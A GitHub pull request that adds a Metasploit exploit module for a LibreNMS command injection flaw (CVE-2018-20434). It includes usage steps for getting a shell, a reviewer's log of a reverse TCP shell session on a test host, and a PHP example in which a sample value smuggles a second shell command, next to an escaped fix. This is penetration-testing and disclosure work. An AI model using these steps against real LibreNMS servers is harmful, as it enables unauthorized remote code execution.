Add exploit module for LibreNMS CVE-2018-20434 #11895

Merged
merged 13 commits into from Jun 4, 2019

@space-r7
Contributor

commented May 29, 2019

This module exploits a command injection vulnerability in the open source network management software known as LibreNMS. The community parameter used in a POST request to the addhost functionality is unsanitized. This parameter is later used as part of a shell command that gets passed to the popen function in capture.inc.php, which can result in execution of arbitrary code.

This module has been tested on LibreNMS v1.45 and v1.46.

Verification

  • Install the application
  • Start msfconsole
  • Do: use exploit/linux/http/librenms_cmd_injection
  • Do: set RHOSTS <ip>
  • Do: set USERNAME <user>
  • Do: set PASSWORD <pass>
  • Do: run
  • You should get a shell.
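
The pattern described above (an unsanitized value reaching `popen`) next to an escaped form, as an added example that is not code from this pull request or from LibreNMS. `printf` stands in for the real command so the script runs offline; the function names, sample values and allowlist policy are assumptions.

```php
<?php
// Added illustration, not LibreNMS or Metasploit code. All names are
// hypothetical; `printf` replaces the real command and prints one [arg] per line.

// Run a command line through popen(), which hands the string to /bin/sh.
function run_via_shell(string $cmd): string
{
    $h = popen($cmd, 'r');
    if ($h === false) {
        throw new RuntimeException('popen failed');
    }
    $out = stream_get_contents($h);
    pclose($h);
    return $out;
}

// Vulnerable pattern: the stored community string is pasted into the command
// string, so the shell interprets any metacharacters it contains.
function cmd_unsafe(string $community): string
{
    return "printf '[%s]\\n' -c $community";
}

// Output encoding at the point of use: the value is quoted so the shell
// treats it as a single literal word.
function cmd_safe(string $community): string
{
    return "printf '[%s]\\n' -c " . escapeshellarg($community);
}

// Input validation at the point of storage (assumed allowlist policy).
function valid_community(string $community): bool
{
    return preg_match('/\A[A-Za-z0-9_.@-]{1,64}\z/', $community) === 1;
}

// Constructed sample values: one ordinary, one containing a command separator.
foreach (['public', 'public; echo INJECTED'] as $c) {
    echo "community = $c (allowlist: ", valid_community($c) ? 'ok' : 'reject', ")\n";
    echo "unsafe:\n", run_via_shell(cmd_unsafe($c));
    echo "safe:\n", run_via_shell(cmd_safe($c));
}
```

With the second sample, the unsafe form prints a separate `INJECTED` line produced by a second shell command, while the escaped form prints the whole value inside one pair of brackets.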

space-r7 added some commits May 24, 2019

space-r7 and others added some commits May 29, 2019

Update modules/exploits/linux/http/librenms_cmd_injection.rb
Co-Authored-By: bcoles <bcoles@gmail.com>
Update modules/exploits/linux/http/librenms_cmd_injection.rb
Co-Authored-By: bcoles <bcoles@gmail.com>
Update modules/exploits/linux/http/librenms_cmd_injection.rb
Co-Authored-By: bcoles <bcoles@gmail.com>

@jrobles-r7 jrobles-r7 self-assigned this May 30, 2019

space-r7 and others added some commits May 30, 2019

@wchen-r7

Contributor

commented May 31, 2019

I'm actually done reviewing. Code looks good to me. Nice work @space-r7 !

@space-r7

Contributor Author

commented May 31, 2019

> I'm actually done reviewing. Code looks good to me. Nice work @space-r7 !

Thanks for the review!

@jrobles-r7

Contributor

commented Jun 4, 2019

Using pre-built v1.46 OVA

msf5 exploit(linux/http/librenms_addhost_cmd_inject) > exploit

[*] Started reverse TCP double handler on 172.22.222.136:4444 
[*] Successfully logged into LibreNMS. Storing credentials...
[+] Successfully added device with hostname cJKrXaerk
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname cJKrXaerk and id #2
[*] Command: echo 4kWimSISfcFWx1in;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "4kWimSISfcFWx1in\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.141:35844) at 2019-06-04 12:17:04 -0500

whoami
www-data
uname -a
Linux librenms 4.15.0-39-generic #42-Ubuntu SMP Tue Oct 23 15:48:01 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

@jrobles-r7 jrobles-r7 merged commit c93c65c into rapid7:master Jun 4, 2019

2 of 3 checks passed

Metasploit Automation - Sanity Test Execution Running automation sanity tests. Details available on completion.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

jrobles-r7 added a commit that referenced this pull request Jun 4, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 4, 2019

@jrobles-r7

Contributor

commented Jun 4, 2019

Release Notes

A module that targets CVE-2018-20434 is now available. It exploits a command injection vulnerability in the open source network management software known as LibreNMS.

@space-r7 space-r7 deleted the space-r7:librenms_exploit branch Jun 5, 2019

@busterb busterb changed the title from "Add exploit module for CVE-2018-20434" to "Add exploit module for LibreNMS CVE-2018-20434" Jun 6, 2019

@tdoan-r7 tdoan-r7 added the rn-modules label Jun 11, 2019
